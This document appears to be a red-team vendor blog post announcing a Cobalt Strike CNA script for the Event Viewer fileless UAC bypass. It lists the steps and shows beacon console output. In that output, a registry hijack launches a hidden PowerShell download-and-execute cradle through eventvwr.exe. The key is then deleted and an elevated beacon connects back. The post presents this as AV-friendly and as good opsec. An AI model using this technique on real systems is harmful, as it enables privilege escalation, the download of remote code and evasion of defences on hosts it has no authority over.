Eventvwr File-less UAC Bypass CNA

Matt Nelson recently released a very useful, file-less UAC bypass using Event Viewer which was quickly implemented in to a Metasploit module by @TheColonial. Following this, we decided to release our own implementation in the form of a Cobalt Strike CNA script. The current default UAC bypass in Cobalt Strike requires DLL hijacking and drops a temporary DLL artefact to disk, as shown in the following:

[code lang=”bash”]
beacon> bypassuac
[*] Tasked beacon to spawn windows/beacon_smb/bind_pipe ( in a high integrity process
[+] host called home, sent: 111759 bytes
[+] received output:
[*] Wrote hijack DLL to ‘C:\Users\vysec\AppData\Local\Temp\0a80.dll’
[+] Privileged file copy success! C:\WINDOWS\System32\NTWDBLIB.dll
[+] C:\WINDOWS\System32\cliconfg.exe ran and exited.
[*] Cleanup successful

Bypassuac-eventvwr was created as a way to easily utilise the EventVwr UAC bypass technique and maintain good opsec practices by not touching disk. This method does not require writing to disk and therefore should be AV friendly.

The CNA script currently performs the following:

  • Write registry path hijack
  • Execute eventvwr.exe
  • When eventvwr.exe executes, the hijack will be called
  • If SMB is used, linking is performed to the new beacon
  • Delete registry path hijack
  • Enjoy elevated beacon

An example usage is shown below:

[code lang=”bash”]
beacon> bypassuac-eventvwr “smb”
[*] Tasked Beacon to BypassUAC to windows/beacon_smb/bind_pipe ( via Eventvwr Fileless UAC Bypass
[*] Adding Registry Key
[*] reg add “HKCU\Software\Classes\mscfile\shell\open\command” /f /d “cmd.exe /c powershell -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘’))
[*] Tasked beacon to run: reg add “HKCU\Software\Classes\mscfile\shell\open\command” /f /d “cmd.exe /c powershell -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘’))
[*] Spawning Eventvwr.exe
[*] Tasked beacon to run: eventvwr.exe
[+] host called home, sent: 3253 bytes
[*] Deleting Registry Key
[*] reg delete “HKCU\Software\Classes\mscfile\shell\open\command” /f
[*] Tasked beacon to run: reg delete “HKCU\Software\Classes\mscfile\shell\open\command” /f
[+] received output:
The operation completed successfully.
[+] host called home, sent: 196761 bytes
[+] established link to child beacon:
[+] received output:
The operation completed successfully.

A brief demonstration of how to use this module is shown below:

You can download Bypassuac-eventvwr from the @MDSecLabs github.

This blog post was written by @vysecurity.

written by

Dominic Chell

Ready to engage
with MDSec?

Copyright 2020 MDSec